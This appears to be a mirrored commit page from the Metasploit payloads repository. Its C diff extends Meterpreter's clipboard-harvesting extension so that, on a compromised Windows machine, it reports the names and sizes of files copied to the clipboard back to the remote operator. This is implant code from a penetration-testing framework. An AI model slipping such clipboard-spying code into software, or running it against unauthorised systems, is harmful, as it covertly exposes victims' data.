mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-30 22:19:17 +02:00
Add size (bytes) of the files on the clipboard
This commit is contained in:
OJ
parent
0eb2063c91
commit
4eb8accc11
c/meterpreter/source/extensions/extapi
@ -39,6 +39,16 @@ typedef BOOL (WINAPI * PEMPTYCLIPBOARD)();
|
|||||||
/*! @brief DragQueryFileA function pointer type. */
|
/*! @brief DragQueryFileA function pointer type. */
|
||||||
typedef BOOL (WINAPI * PDRAGQUERYFILEA)( HDROP hDrop, UINT iFile, LPSTR lpszFile, UINT cch );
|
typedef BOOL (WINAPI * PDRAGQUERYFILEA)( HDROP hDrop, UINT iFile, LPSTR lpszFile, UINT cch );
|
||||||
|
|
||||||
|
/*! @brief CreateFileA function pointer type. */
|
||||||
|
typedef HANDLE (WINAPI * PCREATEFILEA)( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes,
|
||||||
|
DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
|
||||||
|
|
||||||
|
/*! @brief CloseHandle function pointer type. */
|
||||||
|
typedef BOOL (WINAPI * PCLOSEHANDLE)( HANDLE hObject );
|
||||||
|
|
||||||
|
/*! @brief GetFileSizeEx function pointer type. */
|
||||||
|
typedef BOOL (WINAPI * PGETFILESIZEEX)( HANDLE hFile, PLARGE_INTEGER lpFileSize );
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
/*!
|
/*!
|
||||||
@ -69,7 +79,11 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
|
|||||||
PGETCLIPBOARDDATA pGetClipboardData = NULL;
|
PGETCLIPBOARDDATA pGetClipboardData = NULL;
|
||||||
PENUMCLIPBOARDFORMATS pEnumClipboardFormats = NULL;
|
PENUMCLIPBOARDFORMATS pEnumClipboardFormats = NULL;
|
||||||
PDRAGQUERYFILEA pDragQueryFileA = NULL;
|
PDRAGQUERYFILEA pDragQueryFileA = NULL;
|
||||||
|
PCREATEFILEA pCreateFileA = NULL;
|
||||||
|
PCLOSEHANDLE pCloseHandle = NULL;
|
||||||
|
PGETFILESIZEEX pGetFileSizeEx = NULL;
|
||||||
|
|
||||||
|
HANDLE hSourceFile = NULL;
|
||||||
PCHAR lpClipString = NULL;
|
PCHAR lpClipString = NULL;
|
||||||
HGLOBAL hClipboardData = NULL;
|
HGLOBAL hClipboardData = NULL;
|
||||||
HDROP hFileDrop = NULL;
|
HDROP hFileDrop = NULL;
|
||||||
@ -77,6 +91,9 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
|
|||||||
UINT uFileIndex = 0;
|
UINT uFileIndex = 0;
|
||||||
UINT uFileCount = 0;
|
UINT uFileCount = 0;
|
||||||
CHAR lpFileName[MAX_PATH];
|
CHAR lpFileName[MAX_PATH];
|
||||||
|
Tlv entries[2] = {0};
|
||||||
|
LARGE_INTEGER largeInt = {0};
|
||||||
|
|
||||||
|
|
||||||
Packet *pResponse = packet_create_response( packet );
|
Packet *pResponse = packet_create_response( packet );
|
||||||
|
|
||||||
@ -144,6 +161,18 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
|
|||||||
if( (hShell32 = LoadLibraryA( "shell32.dll" )) == NULL)
|
if( (hShell32 = LoadLibraryA( "shell32.dll" )) == NULL)
|
||||||
BREAK_ON_ERROR( "Unable to load shell32.dll" );
|
BREAK_ON_ERROR( "Unable to load shell32.dll" );
|
||||||
|
|
||||||
|
dprintf( "Searching for CreateFileA" );
|
||||||
|
if( (pCreateFileA = (PCREATEFILEA)GetProcAddress( hKernel32, "CreateFileA" )) == NULL )
|
||||||
|
BREAK_ON_ERROR( "Unable to locate CreateFileA in kernel32.dll" );
|
||||||
|
|
||||||
|
dprintf( "Searching for CloseHandle" );
|
||||||
|
if( (pCloseHandle = (PCLOSEHANDLE)GetProcAddress( hKernel32, "CloseHandle" )) == NULL )
|
||||||
|
BREAK_ON_ERROR( "Unable to locate CloseHandle in kernel32.dll" );
|
||||||
|
|
||||||
|
dprintf( "Searching for GetFileSizeEx" );
|
||||||
|
if( (pGetFileSizeEx = (PGETFILESIZEEX)GetProcAddress( hKernel32, "GetFileSizeEx" )) == NULL )
|
||||||
|
BREAK_ON_ERROR( "Unable to locate GetFileSizeEx in kernel32.dll" );
|
||||||
|
|
||||||
dprintf( "Searching for DragQueryFileA" );
|
dprintf( "Searching for DragQueryFileA" );
|
||||||
if( (pDragQueryFileA = (PDRAGQUERYFILEA)GetProcAddress( hShell32, "DragQueryFileA" )) == NULL )
|
if( (pDragQueryFileA = (PDRAGQUERYFILEA)GetProcAddress( hShell32, "DragQueryFileA" )) == NULL )
|
||||||
BREAK_ON_ERROR( "Unable to locate CloseClipboard in shell32.dll" );
|
BREAK_ON_ERROR( "Unable to locate CloseClipboard in shell32.dll" );
|
||||||
@ -159,7 +188,27 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
|
|||||||
for( uFileIndex = 0; uFileIndex < uFileCount; ++uFileIndex ) {
|
for( uFileIndex = 0; uFileIndex < uFileCount; ++uFileIndex ) {
|
||||||
if( pDragQueryFileA( hFileDrop, uFileIndex, lpFileName, sizeof( lpFileName ) ) ) {
|
if( pDragQueryFileA( hFileDrop, uFileIndex, lpFileName, sizeof( lpFileName ) ) ) {
|
||||||
dprintf( "Clipboard file entry: %s", lpFileName );
|
dprintf( "Clipboard file entry: %s", lpFileName );
|
||||||
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, lpFileName );
|
|
||||||
|
memset( &entries, 0, sizeof(entries) );
|
||||||
|
memset( &largeInt, 0, sizeof(largeInt) );
|
||||||
|
|
||||||
|
entries[0].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME;
|
||||||
|
entries[0].header.length = (DWORD)strlen( lpFileName ) + 1;
|
||||||
|
entries[0].buffer = (PUCHAR)lpFileName;
|
||||||
|
|
||||||
|
entries[1].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE;
|
||||||
|
entries[1].header.length = sizeof(QWORD);
|
||||||
|
entries[1].buffer = (PUCHAR)&largeInt.QuadPart;
|
||||||
|
|
||||||
|
if( (hSourceFile = pCreateFileA( lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )) != NULL ) {
|
||||||
|
if( pGetFileSizeEx( hSourceFile, &largeInt ) ) {
|
||||||
|
largeInt.QuadPart = htonq( largeInt.QuadPart );
|
||||||
|
}
|
||||||
|
|
||||||
|
pCloseHandle( hSourceFile );
|
||||||
|
}
|
||||||
|
|
||||||
|
packet_add_tlv_group( pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, entries, 2 );
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@ -31,6 +31,8 @@
|
|||||||
#define TLV_TYPE_EXT_SERVICE_QUERY_DACL MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 26)
|
#define TLV_TYPE_EXT_SERVICE_QUERY_DACL MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 26)
|
||||||
|
|
||||||
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 40)
|
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 40)
|
||||||
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 41)
|
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 41)
|
||||||
|
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 42)
|
||||||
|
#define TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE MAKE_CUSTOM_TLV(TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 43)
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user